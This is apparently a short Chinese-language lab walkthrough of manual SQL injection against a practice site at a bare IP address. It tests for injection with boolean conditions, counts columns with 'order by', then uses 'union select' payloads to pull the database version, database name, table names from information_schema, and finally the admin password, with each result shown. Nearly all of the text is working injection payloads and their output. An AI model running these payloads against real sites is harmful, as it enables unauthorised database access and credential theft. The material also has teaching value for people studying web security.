点击查看新闻得到网址http://120.203.13.75:6815/?id=1
尝试?id=1 and 1=1 页面正常,?id=1 and 1=2,页面显示不正常,判断存在注入点
猜测字段数?id=1 order by 5,最后尝试?id=1 order by 2页面正常
查询数据库版本and 1=2 union select 1,version()
得到数据库版本5.5.53
查询数据库名称and 1=2 union select 1,database()
得到名称maoshe
查询表名and 1=2 union select 1,table_name from information_schema.tables where table_schema=database()
得到表面admin
查询密码and 1=2 union select 1,password from admin
得到密码hellohack
打赏我,让我更有动力~
© 2016 - 2024 掌控者 All Rights Reserved.